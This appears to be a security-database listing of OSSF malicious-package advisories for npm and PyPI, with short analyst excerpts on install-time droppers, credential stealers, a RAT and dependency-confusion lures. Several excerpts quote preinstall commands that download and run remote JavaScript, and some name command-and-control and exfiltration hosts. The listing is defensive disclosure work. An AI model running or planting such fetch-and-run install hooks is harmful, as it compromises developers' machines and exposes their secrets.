Lucene search
K

226591 matches found

OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 2:12 p.m.7 views

Malicious code in @outmarket/ui (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7241a2e167db383267fa82ce9660a44f7bcca4b6d4f11bb7ca85eaa6b432a47e package.json declares a postinstall script that runs automatically on npm install and performs require'https'.get... to a Burp Collaborator subdomain...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 2:12 p.m.7 views

Malicious code in @outmarket/utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2cd90f0d706cda01a5740f120f6e8d22ae57d907a5000854439c201b3c53a8c0 package.json declares a postinstall lifecycle script that fires automatically on npm install. The inline node -e payload uses hex-encoded property...

5.9AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 2:11 p.m.8 views

Malicious code in airbnb-airlock (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 034fd98a2ccd98f2bec2201d130c5a102ad17907c37af34b5162592e26a0fd43 The package's preinstall lifecycle hook in package.json runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js, fetching an unpinne...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 2:11 p.m.7 views

Malicious code in ttal2ttml (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 29387ac35a2248ad2e4b287b8c082f8d1a8d03b4937fc84a5b81fb85697e19d4 package.json declares a preinstall lifecycle script that runs node -e "tryrequire'childprocess'.execSync'curl -sf...

5.8AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 2:10 p.m.8 views

Malicious code in kdrive-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3e7d5af5ddf22d4481fca4847a45189e6160a723341b32dcbb6bf51b49f53943 package.json declares a preinstall lifecycle script that auto-executes on npm install and runs wget -q -O-...

5.8AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 2:10 p.m.5 views

Malicious code in cue-mcp (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5dce71f7cd453bd73a138279dd78ebc607d7c4f6b171bd3b76c7f456a6eb907a The package's postinstall.js script runs automatically on npm install and collects host identifying data os.hostname along with process environment...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 2:10 p.m.8 views

Malicious code in tree-sitter-forth (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 16f52e13ffb66b20f7c3dca7022e8115dbce1f39264638d38b73d6488e4cbf27 Package is a dependency-confusion lure: it claims version 9999.99.99 with description 'npm 404 error referenced in AlexanderBrevig/tree-sitter-forth'...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 2:9 p.m.5 views

Malicious code in myebaynode (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 12d56c05672731322d45fb9273fb782a6b8042260fb019b2d96c755eed084fc3 package.json declares a preinstall lifecycle hook that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js, fetching JavaScript...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 12:15 p.m.6 views

Malicious code in new-helper (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware cabb68bd9f2c4312904814f7c0c11aae7f93772a5c46c28a1ca8292592c83a53 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 12:15 p.m.6 views

Malicious code in new-solt-1 (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 548ecaba7e63993f2d3c88cfb13098ae8b6c69161e2e748bd8b931dcbaec8c7b Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 12:15 p.m.7 views

Malicious code in new-ecro-helper (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f0826d146dbc513ac14f403eaa9ba65dffbd04da52c55ff1840ad153dab96e87 The package publishes verbatim big.js v7.0.1 source including the upstream copyright header, README, repository URL pointing to MikeMcl/big.js, and t...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 12:15 p.m.8 views

Malicious code in new-solt (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 0cb151695f19820479204dd7c0cc067a235aaffbb89340888bd79a39b8e6070c Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 12:15 p.m.6 views

Malicious code in poly-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware bad67795c6c211a5048719f791c96b16470f4954efcd7b3d450328ef4328d7a8 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 12:7 p.m.8 views

Malicious code in toorc (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2cfd36909e089f17439dd3227c6f5ccef2fef2964dc26bbdbaaef0481b54615d On pip install and even pip download, the package's setup.py overrides the install and egginfo commands to execute a RunCommand routine that serializ...

6.1AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 12:7 p.m.7 views

Malicious code in equest (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cfe07e7f1e241dde491d3d6f5553ed2247a6f8e1dfdf34b0eaa9943a2cba5094 The package name equest is a one-character deletion of the widely-used requests package and ships no functional library code. setup.py registers cust...

6.6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 12:5 p.m.8 views

Malicious code in ts-numbering (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware eb07d5e37bf31a4dfe653c7c9634f145ad50c518ad9084c7fdbe893c9fe3da46 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 12:5 p.m.5 views

Malicious code in local-ip-helper (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 62edd1422ec623ef603b4c1d5bf898041000bb1a55470dc798519bdb4e0452b5 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 11:57 a.m.5 views

Malicious code in libsignal-node-travatiger (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 853bda071feb857da7ff2ecaa7809099b31dd181eed007bb9593b0e274e8a8be Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 10:23 a.m.7 views

Malicious code in ip-rotat (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e85ab2724beee13bb6c2658c5bf5d50069c83619f062d39935226ff1fee1c0a3 On pip install or pip download, setup.py registers overridden install and egginfo cmdclass entries that execute ps -elf to capture the host's process...

6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 6:22 a.m.7 views

Malicious code in ts-wross (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 42dae43b7ff77748f10ae5faf6d87b7d63552e5629a37c931ea2c0de3539b469 Package is published under the name ts-wross but its package.json claims authorship by Michael Mclaughlin [email protected] and points its repository...

6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 6:19 a.m.6 views

Malicious code in node-core-libs (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d33f74e3f73fd5580ecf994b7db0349ee540754d65d4467b8b04b8c79e3d257b scripts/postinstall.js runs automatically on npm install Windows only and behaves as a classic install-time dropper. It XOR-decodes key 0x5A a...

6.4AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 6:10 a.m.7 views

Malicious code in search-from-search (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 06e2e600c7cba50d7cc3cbff52a18f77e508ec66be3a50cd4960f84771598548 package.json registers node callback.js as both preinstall and postinstall, so the payload runs automatically on npm install. callback.js collects th...

5.8AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 3:1 a.m.12 views

Malicious code in @ts-apis/ts-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector eccf08a9ba188be941f42f0b088d51fc5b1e84802fe9bd1d1218a6b71a6e2c11 The published tarball's dist/index.js contains an obfuscated payload that runs at require time inside a setTimeout-wrapped IIFE, completely unrelated...

5.9AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 10:38 p.m.9 views

Malicious code in web3-token-helper (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0c826bf782895b60580b94e3a28a2c4562d3742420ce81e9895ad8568da57890 The package advertises itself as a Web3 fee utility but its main export is a dropper. index.js line 140 base64-decodes a platform-specific command...

5.8AI score
Exploits0References6
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 9:53 p.m.13 views

Malicious code in zod-pino (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c536e5a7ee3d5542e1ac822b30ba4525e52b2ae0c964d0c2470468d91b9b41c8 The package is published under a name suggesting a Pino logger integration for Zod, but the tarball contents do not match that purpose and exhibit...

5.9AI score
Exploits0References6
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 9:16 p.m.8 views

Malicious code in @variational/common-ui (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 75a12ea18e08fc325a5698f1da2246ffdfdaa4650971fa2b335fd0904e517079 The package is advertised as 'Shared UI constants and utilities' but lib/index.js executes a malicious payload on require. Sensitive strings hostname...

5.9AI score
Exploits0References14
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 7:54 p.m.9 views

Malicious code in node-fetch-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 78aef0d64a7d761d2987d27aea462083425e5692475cd81332b7a3152c754308 On Windows, scripts/postinstall.js XOR-decodes a hardcoded C2 host node22.lunes.host:3258, authenticates with a 5-minute rolling HMAC-SHA256 token,...

5.8AI score
Exploits0References8
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 6:23 p.m.9 views

Malicious code in vitest-cli (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 27abcc7f2373309feb253b0cc48b1a8bae7c54a3c43aed0c57add697f4067aba Package name vitest-cli impersonates the official Vitest project while declaring empty author, homepage, repository, and bugs metadata. The...

6AI score
Exploits0References6
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 5:42 p.m.6 views

Malicious code in zomato-mcp (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a23c3c63a9064636250be7dffa3781af0f9cdfcfd11a8da875be470c6952033e On npm install, the package's preinstall lifecycle script runs curl against http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site/install/ carrying the...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 5:42 p.m.9 views

Malicious code in zomato-espresso (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 860464bbcd3d56375d93025e494e39a6652bb7d115fb581ee088474a66786c3d Package is a dependency-confusion lure targeting Zomato's internal namespace. package.json declares a preinstall hook that runs curl on every npm...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 5:42 p.m.6 views

Malicious code in zomato-core (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d5042b2ca8b8b3ba1f073344762615dc532864913af3f54a16540d44dde97ba5 package.json declares a preinstall lifecycle hook that runs curl to POST the installer's hostname, whoami output, current working directory, and the...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 5:37 p.m.7 views

Malicious code in sn-internal-testjgsakjdkjadkjah (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fd1a751946e8be92bbd0b675c57b3389e1e54919a69f5f6fef414a16cc2f1261 package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On npm install, th...

6.7AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 5:37 p.m.7 views

Malicious code in test-package-sajsdkashdj (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 62645375d713992c0b37f646ed3cf898e0ea2b56777ca1b531b3d6ee61d93b87 package.json declares a preinstall lifecycle script: "curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js". On every npm install, the...

6.1AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 4:27 p.m.8 views

Malicious code in search-from-feed (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c9291507e6e48bff8b92fcd9dd1f51345077f59aae2692f3d7ca84a8c0581b04 [email protected] is a dependency-confusion attack package. package.json declares both preinstall and postinstall as node callback.js, so the...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 4:26 p.m.8 views

Malicious code in gd-auth-client (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4de00613e21b42bf3c651995beae63ff9d85772b9370145152d172a062be4fb7 package.json declares preinstall: node index.js, which runs automatically on npm install. index.js requires os, dns, https, querystring, and the loca...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 12:0 p.m.5 views

Malicious code in forge-jsx4 (npm)

forge-jsx4 is a remote access trojan RAT published to the public npm registry by the account rafaelsilva [email protected]. Versions 1.0.122 and 1.0.123 were published on June 21-22, 2026 as a reconstitution of the forge-jsx / forge-jsxy campaign, reusing the same command-and-control...

6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 12:0 p.m.7 views

Malicious code in @petitcode/eb-retry (npm)

@petitcode/eb-retry malicious version 1.3.5, published by [email protected] is a trojanized npm package belonging to the wshu.net credential-stealer campaign. The campaign published trojanized look-alike utility packages across 12+ scopes whose publisher accounts all follow the pattern...

6AI score
Exploits0References6
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 12:0 p.m.14 views

Malicious code in @zynkit/jwtbytes (npm)

@zynkit/jwtbytes malicious version 0.5.3, published by [email protected] is a trojanized npm package belonging to the wshu.net credential-stealer campaign. The campaign published trojanized look-alike utility packages across 12+ scopes whose publisher accounts all follow the pattern...

6.5AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 12:0 p.m.11 views

Malicious code in @thymelab/logfx (npm)

@thymelab/logfx malicious version 2.15.5, published by [email protected] is a trojanized npm package belonging to the wshu.net credential-stealer campaign. The campaign published trojanized look-alike utility packages across 12+ scopes whose publisher accounts all follow the pattern...

6.1AI score
Exploits0References6
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 12:0 p.m.12 views

Malicious code in @frostnode/waitfor (npm)

@frostnode/waitfor malicious versions 0.9.0, 0.10.3, 0.10.4, and 0.10.5, published by [email protected] is a trojanized npm package belonging to the wshu.net credential-stealer campaign. The campaign published trojanized look-alike utility packages across 12+ scopes whose publisher accoun...

6.1AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 12:0 p.m.7 views

Malicious code in onboarding-respects-modal (npm)

onboarding-respects-modal is a dependency confusion proof-of-concept package published to the public npm registry by the account r0binak and self-labeled "Security research PoC - Dependency Confusion Hunter". It was published at the artificially high version 999.99.99, a floating-version bait use...

5.8AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 12:0 p.m.7 views

Malicious code in @nullzero/urlcat (npm)

@nullzero/urlcat version 1.4.2, published by [email protected] is a trojanized npm package belonging to the wshu.net credential-stealer campaign. The campaign published trojanized look-alike utility packages across 12+ scopes whose publisher accounts all follow the pattern [email protected], with...

6.4AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 12:0 p.m.7 views

Malicious code in @tinyfox/shapecheck (npm)

@tinyfox/shapecheck malicious version 0.8.7, published by [email protected] is a trojanized npm package belonging to the wshu.net credential-stealer campaign. The campaign published trojanized look-alike utility packages across 12+ scopes whose publisher accounts all follow the pattern...

5.9AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 12:0 p.m.9 views

Malicious code in respects-switch (npm)

respects-switch is a dependency confusion proof-of-concept package published to the public npm registry by the account r0binak and self-labeled "Security research PoC - Dependency Confusion Hunter". It was published at the artificially high version 999.0.0, the canonical floating-version bait use...

5.8AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 12:0 p.m.12 views

Malicious code in @glitchpad/throttler (npm)

@glitchpad/throttler malicious version 2.2.3, published by [email protected] is a trojanized npm package belonging to the wshu.net credential-stealer campaign. The campaign published trojanized look-alike utility packages across 12+ scopes whose publisher accounts all follow the pattern...

5.9AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 12:0 p.m.6 views

Malicious code in @lazyutil/dater (npm)

@lazyutil/dater malicious versions 0.8.1, 0.9.2, 0.9.3, and 0.9.4, published by [email protected] is a trojanized npm package belonging to the wshu.net credential-stealer campaign. The campaign published trojanized look-alike utility packages across 12+ scopes whose publisher accounts all...

6.5AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 12:0 p.m.8 views

Malicious code in crud-respect (npm)

crud-respect is a dependency confusion proof-of-concept package published to the public npm registry by the account r0binak and self-labeled "Security research PoC - Dependency Confusion Hunter". It was published at the artificially high version 999.99.99, a floating-version bait used to outrank ...

5.9AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 7:54 a.m.8 views

Malicious code in inversiones-common (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 347a767ebbbb5843e6b005c167d98c9ab7b3ea943fadd88401682f2a2b14b2a4 setup.py executes a beacon function at module top level before setup is called, so the payload fires automatically on pip install inversiones-common...

6.1AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/21 5:40 p.m.9 views

Malicious code in fork-angular-daterangepicker (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d81ecc9a5b511f1d867597c3834e62c3c174209ba7718db45bf27af5d862d90f package.json declares a preinstall lifecycle hook "preinstall": "node index.js" that runs index.js on every npm install. index.js line 3 hardcodes...

5.8AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/21 4:21 p.m.9 views

Malicious code in hyperpure-core (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 47dd43b980c7b5e3230ee57e6974d40804e54997ed88877ced301402dbcdef4c Package impersonates a Zomato internal namespace name hyperpure-core, repository URL pointing to github.com/zomato/hyperpure-core while shipping a...

6AI score
Exploits0References1
Total number of security vulnerabilities226591